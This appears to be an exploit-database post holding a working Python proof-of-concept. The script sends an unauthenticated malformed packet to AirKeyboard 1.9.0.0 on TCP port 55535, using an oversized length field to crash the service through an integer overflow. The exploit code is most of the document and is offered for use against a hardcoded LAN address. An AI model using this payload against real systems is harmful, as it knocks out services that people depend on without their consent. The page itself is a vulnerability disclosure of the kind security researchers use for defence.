# Exploit Title: AirKeyboard 1.9.0.0 Integer Overflow to Remote Denial # Exploit Title: AirKeyboard 1.9.0.0 Integer Overflow to Remote Denial of
Service (DoS)
# Date: 2025-06-14
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.airkeyboardapp.com/
# Software Link: http://www.airkeyboardapp.com/download?os=Windows
# Version: 1.9.0.0
# Tested on: Windows 10/11
#!/usr/bin/env python3
'''
AirKeyboard 1.9.0.0 suffers from an integer overflow vulnerability in its
TCP request handler. The ReadLength method parses a 4-byte user-supplied
length field without bounds checking, allowing attackers to trigger a
denial-of-service by sending a malformed packet with an oversized length
value. Exploitation requires no authentication and affects the default TCP
port (55535).
'''
import socket
import struct
target_ip = "192.168.8.105"
target_port = 55535
overflow_length = 0xFFFFFFFFFFFFFFFF
body = b"A" * 8
payload = struct.pack("<Q", overflow_length) + body
print(f"[+] Sending packet to {target_ip}:{target_port}")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target_ip, target_port))
s.sendall(payload)
print("[+] Payload sent..")
AirKeyboard 1.9.0.0 Integer Overflow / Denial of Service
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 177
